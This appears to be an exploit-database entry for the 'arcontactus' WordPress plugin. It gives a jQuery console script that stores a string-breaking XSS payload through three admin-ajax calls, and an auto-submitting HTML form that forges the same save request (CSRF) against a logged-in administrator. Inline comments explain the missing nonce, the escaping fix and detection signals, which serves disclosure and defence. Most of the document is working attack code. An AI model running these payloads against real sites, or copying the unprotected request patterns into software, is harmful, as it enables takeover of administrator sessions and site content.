## https://sploitus.com/exploit?id=WPEX-ID:10277
Versions < 1.7.9 (payload from the original submitter)

// PoC for a stored XSS in the "arcontactus" WordPress plugin, versions before
// 1.7.9, as reproduced on this page. It is meant to be pasted into the browser
// console of an already logged-in wp-admin session: `ajaxurl` and `jQuery` are
// globals that WordPress exposes on admin pages and are not defined here.
//
// Defender's reading: three admin-ajax actions are called in sequence
// (save -> reload -> switch). None of the three requests carries a WordPress
// nonce field, and the `subtitle` value below is shaped for a JavaScript-string
// output context, which implies the stored field is echoed back unescaped for
// that context (inferred from the payload, not shown on this page). The
// server-side fix is a nonce + capability check on each action and
// context-aware escaping of stored fields at output; HTML-escaping alone would
// not cover a JS-string sink. For detection, POSTs to admin-ajax.php with
// action=arcontactus_save_menu_item or action=arcontactus_switch_menu_item
// whose text fields contain script-like content are worth alerting on.
var payload = `alert("xss")`;
// Step 1: create a menu item whose subtitle carries the payload.
jQuery.ajax({
    url: ajaxurl,
    method: 'post',
    data: {
        action: "arcontactus_save_menu_item",
        data: {
            ajax: true,
            id:"",
            title: " ",
            // Closes a double-quoted JS string, injects the payload, then
            // reopens a string so the surrounding script stays syntactically
            // valid — presumably matching how the plugin renders the subtitle;
            // TODO confirm against the plugin's admin template.
            subtitle: `";${payload};var x="`,
            icon: "facebook",
            fa_icon: "",
            color: "FFFFFF",
            display: '1',
            registered_only: false,
            type: 2,
            link: "",
            target: 0,
            content: "",
            integration: "",
            js: "console.log(/hello/)",
            status: true,
            // Duplicate of the `id` key above; in an object literal the later
            // entry wins, and both are the empty string, so nothing changes.
            id:""
        }
    },
    success: function(res){
        console.log('Item added, Getting the id now');
        // Step 2: the save response is not used for the id; instead the item
        // list is reloaded and the new row is located in the returned HTML.
        jQuery.ajax({
            url: ajaxurl,
            method: 'post',
            data: {
                action: "arcontactus_reload_menu_items",
            },
            success: function(res){
                // Response is a JSON string whose `content` field holds HTML.
                res = JSON.parse(res);
                // `content` and `itemId` are assigned without a declaration
                // (implicit globals) — tolerated in a console paste, but a
                // ReferenceError under 'use strict'.
                content = jQuery.parseHTML(res.content);
                // Picks the first span under #the-list whose text contains
                // "alert" and walks up two ancestors to read its data-id.
                // Brittle: any other item containing "alert" would match first.
                itemId = jQuery(content).find('#the-list span:contains("alert")').first().parent().parent().attr('data-id');
                console.log(`Activating [${itemId}] now`);
                
                // Step 3: switch the new item on so that it gets rendered.
                jQuery.ajax({
                    url: ajaxurl,
                    method: 'post',
                    data: {
                        action: "arcontactus_switch_menu_item",
                        id: itemId,
                        data: {
                            ajax: true,
                        }
                    },
                    success: function(res){
                        console.log('Success :)');
                    }
                });        
            }
        });
    }
});

Versions < 1.8.8 (payload from the WPScan team; the XSS is triggered in the admin dashboard, on the plugin's settings page)

<!--
  CSRF-to-stored-XSS PoC for the plugin, versions before 1.8.8 (WPScan team).
  When this page is opened in a browser where a WordPress administrator is
  logged in, the body's onload handler auto-submits the form to admin-ajax.php
  and the browser attaches the victim's session cookies. [WP] stands for the
  WordPress site's host. No WordPress nonce field is included in the form,
  which is what makes the request forgeable cross-site; the title and subtitle
  values are later rendered on the plugin's settings page in the admin
  dashboard (per this page's own description). Mitigation is server-side:
  check_ajax_referer() and a capability check on the action, plus escaping of
  stored fields at output. For detection, a POST to admin-ajax.php with
  action=arcontactus_save_menu_item whose Origin/Referer is not the site
  itself is a strong signal.
-->
<html>
  <body onload="document.forms[0].submit();">
    <form action="https://[WP]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="arcontactus_save_menu_item" />
      <input type="hidden" name="ajax" value="true" />
      <input type="hidden" name="data[id]" value="" />
      <!-- The two fields carrying the injected markup; the rest are filler
           so the item passes the plugin's save path. -->
      <input type="hidden" name="data[title]" value="<img src=x onerror=alert(/XSSTitle/)>" />
      <input type="hidden" name="data[subtitle]" value="<script>alert(/XSSSubTitle/)</script>" />
      <input type="hidden" name="data[icon]" value="facebook_messenger" />
      <input type="hidden" name="data[fa_icon]" value="" />
      <input type="hidden" name="data[color]" value="000000" />
      <input type="hidden" name="data[display]" value="1" />
      <input type="hidden" name="data[registered_only]" value="0" />
      <input type="hidden" name="data[type]" value="2" />
      <input type="hidden" name="data[link]" value="" />
      <input type="hidden" name="data[target]" value="0" />
      <input type="hidden" name="data[content]" value="" />
      <input type="hidden" name="data[integration]" value="" />
      <input type="hidden" name="data[js]" value="console.log(/yolo/)" />
      <!-- Note the absence of any _wpnonce / nonce input below. -->
      <input type="hidden" name="id" value="" />
    </form>
  </body>
</html>